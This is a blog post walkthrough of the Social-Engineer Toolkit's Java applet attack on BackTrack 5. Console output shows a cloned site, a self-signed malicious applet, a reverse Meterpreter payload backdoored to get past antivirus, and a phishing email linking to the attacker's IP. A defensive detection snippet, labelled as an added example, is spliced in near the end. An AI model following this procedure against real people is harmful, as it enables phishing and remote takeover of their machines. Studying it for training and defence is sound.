
BT5 2011.4. Social Engineering.1.JAVA

Posted: 2024-08-20 23:16:50

4. Social Engineering Tools

Contents
Part 1: Java Applet Attack Method
Part 2: Credential Harvester Attack Method

Part 1: Java Applet Attack Method

Topology

Introduction to SET

The SET is an advanced, multi-function, and easy to use computer assisted social engineering toolset. It helps you to prepare the most effective way of exploiting the client-side application vulnerabilities and make a fascinating attempt to capture the target's confidential information (for example, e-mail passwords). Some of the most efficient and useful attack methods employed by SET include targeted phishing e-mails with a malicious file attachment, Java applet attacks, browser-based exploitation, gathering website credentials, creating infectious portable media (USB/DVD/CD), mass-mailer attacks, and other similar multi-attack web vectors. This combination of attack methods provides a powerful platform to utilize and select the most persuasive technique that could perform an advanced attack against the human element.

root@bt:~# ifconfig eth1
eth1      Link encap:以太网  硬件地址 00:0c:29:f8:2a:28
          inet 地址:162.168.1.102  广播:162.168.1.255  掩码:255.255.255.0
          inet6 地址: fe80::20c:29ff:fef8:2a28/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  跃点数:1
          接收数据包:20464 错误:0 丢弃:0 过载:0 帧数:0
          发送数据包:38685 错误:0 丢弃:0 过载:0 载波:0
          碰撞:0 发送队列长度:1000
          接收字节:2995416 (2.9 MB)  发送字节:2585033 (2.5 MB)

root@bt:~# netstat -r
内核 IP 路由表
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
162.168.1.0     *               255.255.255.0   U         0 0          0 eth1
default         162.168.1.2     0.0.0.0         UG        0 0          0 eth1

C:\Users\Smoke>ipconfig /all

Windows IP 配置

   主机名  . . . . . . . . . . . . . : Smoke-PC
   主 DNS 后缀 . . . . . . . . . . . :
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否

无线局域网适配器 无线网络连接:

   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : 1x1 11b/g/n Wireless LAN PCI Express Half Mini Card Adapter
   物理地址. . . . . . . . . . . . . : 7C-E9-D3-F8-4B-87
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::c104:d994:990d:a57e%17(首选)
   IPv4 地址 . . . . . . . . . . . . : 162.168.1.101(首选)
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   获得租约的时间  . . . . . . . . . : 2015年4月15日 16:48:24
   租约过期的时间  . . . . . . . . . : 2015年4月15日 23:48:23
   默认网关. . . . . . . . . . . . . : 162.168.1.2
   DHCP 服务器 . . . . . . . . . . . : 162.168.1.2
   DHCPv6 IAID . . . . . . . . . . . : 578611667
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1A-CC-98-0C-3C-97-0E-18-96-17
   DNS 服务器  . . . . . . . . . . . : 221.11.1.67
                                       221.11.1.68
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

C:\Users\Smoke>ping www.baidu.com

正在 Ping www.a.shifen.com [61.135.169.121] 具有 32 字节的数据:
来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54
来自 61.135.169.121 的回复: 字节=32 时间=41ms TTL=54
来自 61.135.169.121 的回复: 字节=32 时间=36ms TTL=54
来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54

61.135.169.121 的 Ping 统计信息:
    数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
    最短 = 35ms,最长 = 41ms,平均 = 36ms

Modify the configuration file (1)

root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# cd config/
root@bt:/pentest/exploits/set/config# ls
mailing_list.txt  set_config  set_config.save  set_config.save.1  slim_set.py
root@bt:/pentest/exploits/set/config# vim set_config
METASPLOIT_PATH=/pentest/exploits/framework3
ETTERCAP=ON
EMAIL_PROVIDER=GMAIL
SELF_SIGNED_APPLET=ON
JAVA_ID_PARAM=Secure Java Applet
root@bt:/pentest/exploits/set/config# cd ..
root@bt:/pentest/exploits/set# ./set

                             .--.  .--. .-----.
                        : .--': .--'`-. .-'
                        `. `. : `;    : :
                           _`, :: :__   : :
                          `.__.'`.__.'  :_;

  [---]        The Social-Engineer Toolkit (SET)         [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]                Version: 2.4.1                    [---]
  [---]              Codename: 'Renegade'                [---]
  [---]       Report bugs: [email protected]     [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

    Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

                     .M"""bgd `7MM"""YMM MMP""MM""YMM
                 ,MI    "Y   MM    `7 P'   MM   `7
                 `MMb.       MM   d        MM
                   `YMMNq.   MMmmMM        MM
                 .     `MM   MM   Y  ,     MM
                 Mb     dM   MM     ,M     MM
                 P"Ybmmd"  .JMMmmmmMMM   .JMML.

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) Third Party Modules

  99) Return back to the main menu.

set> 2

 The Web Attack module is  a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

 The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

 The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.

 The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>1

 The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

 The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2

 Simply enter in the required fields, easy example below:

 Name: FakeCompany
 Organization: Fake Company
 Organization Name: Fake Company
 City: Cleveland
 State: Ohio
 Country: US
 Is this correct: yes

[!] *** WARNING ***
[!] IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk
[!] *** WARNING ***
您的名字与姓氏是什么?
  [Unknown]:  cisco
您的组织单位名称是什么?
  [Unknown]:  cisco
您的组织名称是什么?
  [Unknown]:  cisco
您所在的城市或区域名称是什么?
  [Unknown]:  bj
您所在的州或省份名称是什么?
  [Unknown]:  bj
该单位的两字母国家代码是什么
  [Unknown]:  cn
CN=cisco, OU=cisco, O=cisco, L=bj, ST=bj, C=cn 正确吗?
  [否]:  y

警告:
签名者证书将在六个月内过期。
[*] Java Applet is now signed and will be imported into the website
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:http://www.baidu.com

[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: IierAbDuaKTT
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            New custom interactive reverse shell designed for SET
  12) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  13) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  14) Import your own executable              Specify a path for your own executable

set:payloads>2

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
   2) shikata_ga_nai (Very Good)
   3) alpha_mixed (Normal)
   4) alpha_upper (Normal)
   5) call4_dword_xor (Normal)
   6) countdown (Normal)
   7) fnstenv_mov (Normal)
   8) jmp_call_additive (Normal)
   9) nonalpha (Normal)
  10) nonupper (Normal)
  11) unicode_mixed (Normal)
  12) unicode_upper (Normal)
  13) alpha2 (Normal)
  14) No Encoding (None)
  15) Multi-Encoder (Excellent)
  16) Backdoored Executable (BEST)

set:encoding>16
set:payloads> PORT of the listener [443]:
[*] Generating x64-based powershell injection code...
/bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录
[*] Generating x86-based powershell injection code...
/bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录
[*] Finished generating shellcode powershell injection attack and is encoded to bypass excution restriction policys...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[*] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate
[*] Generating OSX payloads through Metasploit...
[*] Generating Linux payloads through Metasploit...

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[-] Launching MSF Listener...
[-] This may take a few to load MSF...

   Social Engineer Toolkit Mass E-Mailer

   There are two options on the mass e-mailer, the first would
   be to send an email to one individual person. The second option
   will allow you to import a list and send it to as many people as
   you want within that list.

   What do you want to do:

    1.  E-Mail Attack Single Email Address
    2.  E-Mail Attack Mass Mailer

    99. Return to main menu.

set:mailer>1
set:phishing> Send email to:[email protected]

set:phishing>1
set:phishing> Your gmail email address: :[email protected]
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
set:phishing> Email subject:pls check this sites
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:pls check this sites
Next line of the body: http://162.168.1.102
Next line of the body: ^C
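A defender-side check for the two artefacts this session leaves behind: the e-mailed link to a bare IP address flagged as high priority, and the cloned page carrying a Java applet embed. This is an added example, not part of the original post or of SET; the header names used to recognise "high priority" and the sample mail and page are assumptions constructed for illustration.

```python
import ipaddress
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

def ip_literal_links(text):
    """Return URLs whose host is a raw IPv4/IPv6 address rather than a DNS name."""
    hits = []
    for url in (u.rstrip(".,;)") for u in URL_RE.findall(text)):
        try:
            ipaddress.ip_address(urlsplit(url).hostname or "")
        except ValueError:  # ordinary hostname, or a malformed URL
            continue
        hits.append(url)
    return hits

def triage_mail(raw):
    """Flag the lure traits seen in the session: IP-literal link, high priority."""
    msg = message_from_string(raw)
    body = "".join((p.get_payload(decode=True) or b"").decode("utf-8", "replace")
                   for p in msg.walk() if p.get_content_maintype() == "text")
    findings = [f"ip-literal link: {u}" for u in ip_literal_links(body)]
    # Assumption: high priority appears as X-Priority 1/2 or Importance: high.
    prio = (msg.get("X-Priority", "") + " " + msg.get("Importance", "")).lower()
    if re.search(r"\b[12]\b|high", prio):
        findings.append("marked high priority")
    return findings

class AppletFinder(HTMLParser):
    """Collect Java applet embeds: <applet>, or <object>/<embed> with a Java type."""
    def __init__(self):
        super().__init__()
        self.embeds = []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        java_type = "java" in (a.get("type", "") + a.get("classid", "")).lower()
        if tag == "applet" or (tag in ("object", "embed") and java_type):
            self.embeds.append((tag, a.get("archive", "") or a.get("code", "")))

def find_applets(html):
    finder = AppletFinder()
    finder.feed(html)
    return finder.embeds

# Constructed samples modelled on the session above (not captured traffic).
SAMPLE_MAIL = "Subject: pls check this sites\nX-Priority: 1\n\npls check this sites\nhttp://162.168.1.102\n"
SAMPLE_PAGE = '<html><body><applet code="A.class" archive="a.jar" width="1" height="1"></applet></body></html>'
```

Either finding on its own is weak evidence; a page fetched from an IP-literal link that also embeds an applet is the combination worth escalating.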

From: https://www.cnblogs.com/smoke520/p/18370545
